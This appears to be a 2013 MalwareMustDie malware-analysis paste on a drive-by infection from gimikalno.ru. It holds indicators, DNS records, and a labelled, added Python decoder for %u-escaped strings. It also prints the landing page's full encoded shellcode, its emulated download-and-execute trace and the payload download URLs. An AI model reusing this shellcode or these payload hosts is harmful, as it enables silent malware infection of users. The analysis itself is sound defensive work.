#MalwareMustDie!
#Case .ru:8080/*/column.php infection
# Referer: http://pastebin.com/4WxSgjk7
# Infector: gimikalno.ru at 66.249.23.64, 94.102.14.239, 5.9.40.136
# @unixfreaxjp ~]$ date
# Tue Mar 12 02:44:53 JST 2013
# payload malware binary snapshots I put:
http://urlquery.net/report.php?id=1373504
http://urlquery.net/report.php?id=1373509
http://urlquery.net/report.php?id=1373512
http://urlquery.net/report.php?id=1373517
#Virus Total:
URL: https://www.virustotal.com/en/file/b87c1be1dd90d9ae8e7b04c87a6ab0a2b706ded02e2f4c3db45db1bed9d46642/analysis/1363023004/
SHA256: b87c1be1dd90d9ae8e7b04c87a6ab0a2b706ded02e2f4c3db45db1bed9d46642
SHA1: 656ade98396bc2f671ad7344d179b791b2bece05
MD5: 93a104caf7b01de69614498de5cf870a
File size: 104.0 KB ( 106496 bytes )
File name: info.exe
File type: Win32 EXE
Detection ratio: 2 / 45
Analysis date: 2013-03-11 17:30:04 UTC ( 0 minutes ago )
// DNS
gimikalno・ru
origin = ns1・gimikalno・ru
mail addr = root・gimikalno・ru
serial = 2012010101
refresh = 604800
retry = 1800
expire = 1800
minimum = 60
domain: GIMIKALNO・RU
nserver: ns1・gimikalno・ru・ 41・168・5・140
nserver: ns2・gimikalno・ru・ 110・164・58・250
nserver: ns3・gimikalno・ru・ 210・71・250・131
nserver: ns4・gimikalno・ru・ 194・249・217・8
nserver: ns5・gimikalno・ru・ 72・251・206・90
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: NAUNET-REG-RIPN
admin-contact: https://client・naunet・ru/c/whoiscontact
created: 2013・03・03
paid-till: 2014・03・03
free-date: 2014・04・03
source: TCI
Last updated on 2013・03・11 20:56:36 MSK
// landing page:
--2013-03-12 02:16:24-- h00p://gimikalno・ru:8080/forum/links/column・php
Resolving gimikalno・ru・・・ seconds 0・00, 5・9・40・136, 66・249・23・64, 94・102・14・239
Caching gimikalno・ru => 5・9・40・136 66・249・23・64 94・102・14・239
Connecting to gimikalno・ru|5・9・40・136|:8080・・・ seconds 0・00, connected・
:
GET /forum/links/column・php HTTP/1・0
Referer: http://malwaremustdie・org-you-stupid-moronz
Host: gimikalno・ru:8080
HTTP request sent, awaiting response・・・
:
HTTP/1・1 200 OK
Server: nginx/1・0・10
Date: Mon, 11 Mar 2013 17:15:23 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5・3・18-1~dotdeb・0
Vary: Accept-Encoding
200 OK
Length: unspecified [text/html]
Saving to: `column・php'
2013-03-12 02:16:29 (50・1 KB/s) - `column・php' saved [156642]
// shellcode:
- %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0ce9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u414f%u4145%u4943%u4644%u0647%u5d5a%u1012%u1018%u0718%u474e%u5d5a%u0745%u4144%u4346%u075b%u474b%u5d44%u4645%u5806%u5840%u4017%u154e%u5f1a%u1912%u1244%u4419%u1a12%u125e%u4e19%u510e%u154d%u5e1a%u1912%u1243%u4519%u1b12%u121a%u1b1b%u1912%u1243%u4319%u1b12%u1219%u4219%u1912%u0e47%u155b%u4319%u5c0e%u154c%u0e5a%u4250%u4e15%u2828
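The shellcode above is %u-escaped, the form a browser-side unescape() call turns into bytes before the exploit jumps into it. As an added example that is not part of the original paste, this Python decoder performs the same conversion offline (each %uXXXX word is a little-endian 16-bit value, so %u8366 becomes the bytes 66 83) and pulls such strings out of a page's unescape() calls; the sample words are the first four of the paste's shellcode, and the surrounding script snippet is constructed and is not the paste's column.php.

```python
import re

# Constructed sample: the first four %u words of the paste's shellcode line,
# which decode to the bytes 41 41 41 41 66 83 e4 fc.
SAMPLE_WORDS = "%u4141%u4141%u8366%ufce4"

# Constructed sample of how such a string typically sits in a landing page;
# the surrounding script is an assumption, not the paste's column.php.
SAMPLE_PAGE = '<script>var sc = unescape("%u4141%u4141%u8366%ufce4");</script>'

_WORD = re.compile(r"%u([0-9a-fA-F]{4})")
_UNESCAPE = re.compile(r"unescape\(\s*[\"']((?:%u[0-9a-fA-F]{4})+)[\"']")


def decode_unicode_escaped(s: str) -> bytes:
    """Turn a run of %uXXXX words into raw bytes.

    Each word is a 16-bit little-endian value, so %u8366 becomes the bytes
    66 83.  Anything that is not a clean run of whole words is rejected, so a
    truncated or tampered string fails loudly instead of shifting every byte.
    """
    words = _WORD.findall(s)
    if not words or len(words) * 6 != len(s):
        raise ValueError("input is not a clean run of %uXXXX words")
    out = bytearray()
    for w in words:
        value = int(w, 16)
        out.append(value & 0xFF)   # low byte first
        out.append(value >> 8)     # then high byte
    return bytes(out)


def hexdump(data: bytes, width: int = 16) -> list[str]:
    """Render bytes as space-separated hex rows, 16 per row by default."""
    return [" ".join(f"{b:02x}" for b in data[i:i + width])
            for i in range(0, len(data), width)]


def find_unescape_strings(page: str) -> list[str]:
    """Pull every %u-encoded unescape() argument out of a page's source."""
    return _UNESCAPE.findall(page)


if __name__ == "__main__":
    for blob in find_unescape_strings(SAMPLE_PAGE):
        print("\n".join(hexdump(decode_unicode_escaped(blob))))
```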
// shellcode translate・・・
0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
// cracked payload download urls:
h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
h00p://66・249・23・64:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
h00p://94・102・14・239:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
h00p://5・9・40・136:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
// payload download log:
--2013-03-12 02:24:28-- h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
Resolving gimikalno・ru・・・ seconds 0・00, 94・102・14・239, 5・9・40・136, 66・249・23・64
Caching gimikalno・ru => 94・102・14・239 5・9・40・136 66・249・23・64
Connecting to gimikalno・ru|94・102・14・239|:8080・・・ seconds 0・00, connected・
:
GET /forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f HTTP/1・0
Host: gimikalno・ru:8080
HTTP request sent, awaiting response・・・
:
HTTP/1・1 200 OK
Server: nginx/1・0・10
Date: Mon, 11 Mar 2013 17:28:36 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5・3・18-1~dotdeb・0
Pragma: public
Expires: Mon, 11 Mar 2013 17:24:21 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info・exe"
Content-Transfer-Encoding: binary
Content-Length: 106496
:
200 OK
Registered socket 1892 for persistent reuse・
Length: 106496 (104K) [application/x-msdownload]
Saving to: `info・exe'
2013-03-12 02:24:31 (56・1 KB/s) - `info・exe' saved [106496/106496]
---
#MalwareMustDie! @unixfreaxjp